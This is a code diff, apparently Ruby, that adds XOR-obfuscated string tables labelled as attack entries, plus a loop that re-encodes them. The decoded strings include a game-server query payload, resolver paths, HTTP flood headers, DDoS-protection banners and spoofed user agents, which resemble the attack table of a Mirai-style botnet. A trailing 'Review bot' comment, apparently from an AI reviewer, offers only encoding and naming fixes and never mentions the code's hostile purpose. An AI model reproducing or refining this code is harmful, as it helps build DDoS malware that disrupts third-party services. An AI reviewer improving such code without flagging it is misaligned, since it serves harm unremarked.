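+TABLE_ATK_VSE: "\x76\x71\x4d\x57\x50\x41\x47\x02\x67\x4c\x45\x4b\x4c\x47\x02\x73\x57\x47\x50\x5b\x22",
+TABLE_ATK_RESOLVER: "\x0d\x47\x56\x41\x0d\x50\x47\x51\x4d\x4e\x54\x0c\x41\x4d\x4c\x44\x22",
+TABLE_ATK_NSERV: "\x4c\x43\x4f\x47\x51\x47\x50\x54\x47\x50\x02\x22",
+TABLE_ATK_KEEP_ALIVE: "\x61\x4d\x4c\x4c\x47\x41\x56\x4b\x4d\x4c\x18\x02\x49\x47\x47\x52\x0f\x43\x4e\x4b\x54\x47\x22",
+TABLE_ATK_ACCEPT: "\x63\x41\x41\x47\x52\x56\x18\x02\x56\x47\x5a\x56\x0d\x4a\x56\x4f\x4e\x0e\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x4a\x56\x4f\x4e\x09\x5a\x4f\x4e\x0e\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x4f\x4e\x19\x53\x1f\x12\x0c\x1b\x0e\x4b\x4f\x43\x45\x47\x0d\x55\x47\x40\x52\x0e\x08\x0d\x08\x19\x53\x1f\x12\x0c\x1a\x22",
+TABLE_ATK_ACCEPT_LNG: "\x63\x41\x41\x47\x52\x56\x0f\x6e\x43\x4c\x45\x57\x43\x45\x47\x18\x02\x47\x4c\x0f\x77\x71\x0e\x47\x4c\x19\x53\x1f\x12\x0c\x1a\x22",
+TABLE_ATK_CONTENT_TYPE: "\x61\x4d\x4c\x56\x47\x4c\x56\x0f\x76\x5b\x52\x47\x18\x02\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x0f\x55\x55\x55\x0f\x44\x4d\x50\x4f\x0f\x57\x50\x4e\x47\x4c\x41\x4d\x46\x47\x46\x22",
+TABLE_ATK_SET_COOKIE: "\x51\x47\x56\x61\x4d\x4d\x49\x4b\x47\x0a\x05\x22",
+TABLE_ATK_REFRESH_HDR: "\x50\x47\x44\x50\x47\x51\x4a\x18\x22",
+TABLE_ATK_LOCATION_HDR: "\x4e\x4d\x41\x43\x56\x4b\x4d\x4c\x18\x22",
+TABLE_ATK_SET_COOKIE_HDR: "\x51\x47\x56\x0f\x41\x4d\x4d\x49\x4b\x47\x18\x22",
+TABLE_ATK_CONTENT_LENGTH_HDR: "\x41\x4d\x4c\x56\x47\x4c\x56\x0f\x4e\x47\x4c\x45\x56\x4a\x18\x22",
+TABLE_ATK_TRANSFER_ENCODING_HDR: "\x56\x50\x43\x4c\x51\x44\x47\x50\x0f\x47\x4c\x41\x4d\x46\x4b\x4c\x45\x18\x22",
+TABLE_ATK_CHUNKED: "\x41\x4a\x57\x4c\x49\x47\x46\x22",
+TABLE_ATK_KEEP_ALIVE_HDR: "\x49\x47\x47\x52\x0f\x43\x4e\x4b\x54\x47\x22",
+TABLE_ATK_CONNECTION_HDR: "\x41\x4d\x4c\x4c\x47\x41\x56\x4b\x4d\x4c\x18\x22",
+TABLE_ATK_DOSARREST: "\x51\x47\x50\x54\x47\x50\x18\x02\x46\x4d\x51\x43\x50\x50\x47\x51\x56\x22",
+TABLE_ATK_CLOUDFLARE_NGINX: "\x51\x47\x50\x54\x47\x50\x18\x02\x41\x4e\x4d\x57\x46\x44\x4e\x43\x50\x47\x0f\x4c\x45\x4b\x4c\x5a\x22",
+TABLE_HTTP_ONE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x13\x12\x0c\x12\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x13\x0c\x12\x0c\x10\x15\x12\x16\x0c\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
+TABLE_HTTP_TWO: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x13\x12\x0c\x12\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x10\x0c\x12\x0c\x10\x15\x16\x11\x0c\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
+TABLE_HTTP_THREE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x14\x0c\x13\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x13\x0c\x12\x0c\x10\x15\x12\x16\x0c\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
+TABLE_HTTP_FOUR: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x14\x0c\x13\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x10\x0c\x12\x0c\x10\x15\x16\x11\x0c\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
+TABLE_HTTP_FIVE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x6f\x43\x41\x4b\x4c\x56\x4d\x51\x4a\x19\x02\x6b\x4c\x56\x47\x4e\x02\x6f\x43\x41\x02\x6d\x71\x02\x7a\x02\x13\x12\x7d\x13\x13\x7d\x14\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x14\x12\x13\x0c\x15\x0c\x15\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x74\x47\x50\x51\x4b\x4d\x4c\x0d\x1b\x0c\x13\x0c\x10\x02\x71\x43\x44\x43\x50\x4b\x0d\x14\x12\x13\x0c\x15\x0c\x15\x22"
+}
+
+hashtable.each { |key, value|
+decode_value = []
+value.each_byte { |bite| decode_value << "\\x%02x" % (bite ^ 0x22) }
+puts "add_entry(#{key}, \"#{decode_value.join}\", #{value.length});"
+}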
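Review bot: The length argument printed by the `puts` line comes from `value.length`, which counts characters, while the escapes are produced per byte by `each_byte`; for a literal holding bytes above 0x7f, such as `TABLE_SCAN_CB_PORT`, the two can disagree whenever those bytes form a multibyte character under the file's source encoding. Using `#{value.bytesize}` keeps the printed count tied to the bytes actually emitted. The XOR constant `0x22` is also unexplained: a named constant with a one-line comment stating that it is the per-byte key applied to every table string, and that the closing `\x22` of each string decodes to the `\x00` terminator included in the length, would let a reader check the output without re-deriving it.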